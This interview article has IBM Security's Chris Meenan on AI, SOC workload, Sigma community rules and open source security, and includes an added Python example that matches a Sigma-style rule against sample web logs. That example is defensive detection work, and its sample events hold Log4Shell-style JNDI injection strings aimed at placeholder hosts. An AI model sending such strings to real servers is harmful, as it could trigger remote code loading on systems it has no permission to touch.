Interview: Chris Meenan On The Role Of AI And Open Source Technologies In The Future Of Cybersecurity
Chris Meenan explains the biggest challenges currently facing SOC teams and the future of open source technology.
The cybersecurity industry is experiencing a volatile period, with rapid advancements in technology alongside global conflicts and widespread economic downturn putting a strain on IT and SOC teams. On top of that, IT infrastructure is becoming increasingly complex as businesses migrate to the cloud to leverage the agility, scalability, and financial benefits of a cloud infrastructure.
“Organizations are moving to the cloud and our attack surface is expanding,” says Chris Meenan, VP of Security Product Management at IBM Security. “There are new tools, new technologies, new acronyms, and new languages. It’s exacerbating a lot of existing challenges.”
Chris is responsible for IBM Security’s threat management portfolio, which includes QRadar SIEM, Log Manager, Risk Manager, and Vulnerability Manager—all of which are used by IBM Security’s customers to detect and respond to threats. Chris has over 20 years of experience in the software industry, specializing in product development, launch, and marketing.
In an exclusive interview with Expert Insights at RSAC 2023, Chris discusses the biggest challenges currently facing SOC teams, how we can expect the rise of AI to impact the threat landscape in the coming years, how smaller organizations can keep up with those changes, and the role of open source technologies in the future of cybersecurity.
You can listen to our full conversation with Chris on the Expert Insights Podcast.
AI And ML: Improving Efficiency For Defense Teams And Black Hats Alike
The rise of AI has been a particularly big topic this year, with advances in ML-driven technologies such as ChatGPT taking the media by storm. One of the biggest questions in the security world is how adversaries will utilize these tools—after all, we must assume that both sides of the cyber war have access to them.
Many security experts suggest that, rather than using AI and ML to develop new attack methods, it’s likely that threat actors will use them to make their current methods more effective.
“Attackers are using more AI and automation to accelerate their ability to launch campaigns against their targets,” says Chris. “The average time for launching a ransomware attack has gone down from days to just minutes, using automation.”
But it isn’t only the Black Hats that are working out how to utilize new AI technologies—security providers are also looking for ways to leverage the technology within their defensive portfolios. If they can do this effectively, some of the pressure on SOC teams can be reduced throughout their cloud migration.
“AI has been on a bit of a journey in security,” says Chris. “IBM has 13 SOCs globally that we use to secure our customers, and we’ve been building and maturing our AI in there the last few years. It’s helping get to the high priority alerts and incidents really quickly and taking away some of the noise.”
“But—with this move to cloud, all the new technologies, the new languages, and the new types of attack—I think AI has got a really big role to play in terms of bringing all of that back into a simpler language for the security team to interpret what’s happening and what they should do.”
By utilizing AI, security teams will be able to automate many of the repetitive, administrative tasks that they have to carry out, leaving them with more time to work on threat detection and remediation, thereby improving their infrastructure.
“We will see [AI] being used as a real force multiplier within security,” explains Chris.
The Importance Of Community
In the face of these changes, it can be difficult for businesses to know where to start when it comes to security—particularly among organizations that may not have extensive technical or financial resources in-house to dedicate to security. There are two important sources of help that these organizations can rely on: managed service providers (MSPs), and the wider security community.
“Trusted partners are always a great thing to lean on,” says Chris. “At IBM, we focus a lot on technology, but we also focus on ensuring that our customers have an ecosystem of partners. We provide services to help, but we also have a partner ecosystem.”
“There’s another element that has been growing quite significantly in the last couple of years—the InfoSec community itself, and the development of open source and open standards for security. You’re starting to see a lot of communities around standards such as Sigma, for threat intelligence and information exchange.”
The power of community in the security industry was exemplified in response to the 2022 Log4j vulnerability.
“Within 30 minutes of that vulnerability being published, there was a protection created by the community and published on the Sigma GitHub. Yet a week later, there were still some vendors—not IBM—that had not published their guidance or ability to detect and remediate that vulnerability.”
“So, I think the InfoSec community is going to become a really big factor in being able to collaborate a lot easier.”
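To make concrete what a community-shared detection standard buys a SOC team, the following is an added example (not IBM’s, Expert Insights’, or the Sigma project’s code): a minimal matcher that takes a rule laid out the way Sigma rules are (a `logsource`, named selections under `detection`, and a `condition` that combines them) and runs it over a handful of constructed web-server events. The rule itself is illustrative and is not the community rule Chris refers to; the field names, the sample events and the internal-scanner filter are all assumptions made for the example.

```python
"""Minimal matcher for Sigma-style detection rules, run over constructed log events.

Added example; not IBM's, Expert Insights', or the Sigma project's code. The rule
below mirrors the Sigma YAML layout (logsource / detection / condition) but is
illustrative only, not the community rule mentioned in the interview.
"""
import re
from typing import Any, Iterable

# A rule as it would be loaded from YAML, embedded as a dict so the example
# runs without a YAML library. Field names and values are constructed.
SIGMA_RULE: dict[str, Any] = {
    "title": "Possible JNDI lookup string in web request",
    "logsource": {"category": "webserver"},
    "detection": {
        "selection": {"uri|contains": "${jndi:"},
        # Hypothetical: an internal scanner we already know about, so its hits are suppressed.
        "filter": {"src_ip|startswith": ["10.0.0.", "192.168."]},
        "condition": "selection and not filter",
    },
    "level": "high",
}


def _match_value(modifier: str, actual: str, expected: str) -> bool:
    """Apply one Sigma value modifier (string comparisons are case-insensitive)."""
    a, e = actual.lower(), expected.lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "re":
        return re.search(expected, actual) is not None
    return a == e  # no modifier: exact match


def match_selection(selection: dict, event: dict) -> bool:
    """All fields in a selection must match (ANDed); a list of values for one field is ORed."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        actual = event.get(field)
        if actual is None:
            return False
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(modifier, str(actual), str(v)) for v in values):
            return False
    return True


def evaluate_condition(condition: str, results: dict[str, bool]) -> bool:
    """Evaluate a flat condition such as 'a and not b or c' (precedence: not > and > or)."""
    for or_group in condition.split(" or "):
        group_ok = True
        for term in or_group.split(" and "):
            term = term.strip()
            negate = term.startswith("not ")
            name = term[4:].strip() if negate else term
            if name not in results:
                raise ValueError(f"unknown selection in condition: {name}")
            if results[name] == negate:  # term is false when value == negation flag
                group_ok = False
                break
        if group_ok:
            return True
    return False


def rule_matches(rule: dict, event: dict) -> bool:
    """Evaluate every named selection against the event, then combine them via the condition."""
    detection = rule["detection"]
    results = {name: match_selection(sel, event)
               for name, sel in detection.items() if name != "condition"}
    return evaluate_condition(detection["condition"], results)


def run_rule(rule: dict, events: Iterable[dict]) -> list[dict]:
    """Return the events the rule fires on."""
    return [e for e in events if rule_matches(rule, e)]


# Constructed sample web-server events (not real traffic; example.invalid domains).
SAMPLE_EVENTS = [
    {"src_ip": "203.0.113.7", "uri": "/index.html", "user_agent": "Mozilla/5.0"},
    {"src_ip": "203.0.113.9", "uri": "/login?user=${jndi:ldap://example.invalid/a}", "user_agent": "curl/7.88"},
    {"src_ip": "10.0.0.5", "uri": "/login?user=${JNDI:ldap://scanner.example.invalid/x}", "user_agent": "internal-scanner"},
    {"src_ip": "198.51.100.4", "uri": "/search?q=jndi", "user_agent": "Mozilla/5.0"},
]

if __name__ == "__main__":
    for hit in run_rule(SIGMA_RULE, SAMPLE_EVENTS):
        print(f"[{SIGMA_RULE['level']}] {SIGMA_RULE['title']}: {hit['src_ip']} {hit['uri']}")
```

Run as a script, it reports only the second event: the third carries the same pattern but comes from the excluded internal range, and the fourth merely mentions the word. The point of the exercise is the separation the standard gives you: the rule is data that can be published and pulled from a shared repository within minutes, while the matching engine (here a few dozen lines; in practice the SIEM’s own backend) stays the same.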
The Future Is Open Source
The security community is increasingly embracing the use of open source technologies and standards. Open source technology is distributed with its source code; this means it’s freely available for anyone to use, modify, and redistribute. Open source projects encourage transparent exchange and collaboration. There is a sense of community when it comes to developing and using open source code. Because of this, some experts consider open source code to be more secure than proprietary code.
“When you look at open source code, there are thousands of developers looking at it every day. So, if there are vulnerabilities in it, someone’s going to see them really quickly,” explains Chris.
Because of this, we can expect more vendors to start embracing open source within their own solutions. However, one of the challenges with this lies in the question of responsibility for the security of the code: is it down to the creator to fix issues, or the distributors, or the people using it in their own technology?
“A lot of organizations don’t take the open source code and compile it themselves; they’ll take it pre-compiled,” says Chris. “I think that we will continue to see trusted vendors that take open source code, compile it themselves, and then support and share it. In which case, I think, as part of the value of that, they should be providing some of the certification.”
Despite these questions, we should expect the industry to continue to embrace open source as a means of accelerating the detection of vulnerabilities and backdoors, says Chris. But it doesn’t just offer benefits to security providers; open source security can also be hugely beneficial to businesses trying to improve their own security.
“If you have an open source and open standards approach, where security products publish standards-based APIs and have standards-based ontologies, that’s going to save security teams an incredible amount of time and give them an incredible amount of choice, because they’re not going to get locked into vendor-specific integrations,” explains Chris.